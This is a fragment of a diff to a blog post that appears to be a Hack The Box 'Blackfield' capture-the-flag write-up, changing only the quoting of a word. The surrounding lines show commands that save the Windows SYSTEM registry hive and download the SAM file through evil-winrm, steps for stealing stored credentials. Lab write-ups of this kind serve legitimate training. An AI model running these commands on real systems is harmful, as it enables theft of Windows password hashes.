Vorkharium/vorkharium.github.io/_posts/2024-11-03-HTB-Blackfield-Write-up.md

 reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
 ```

-Then we can move the files using the "download" command in evil-winrm:
+Then we can move the files using the download command in evil-winrm:
 ```shell
 cd C:\Windows\Temp
 download SAM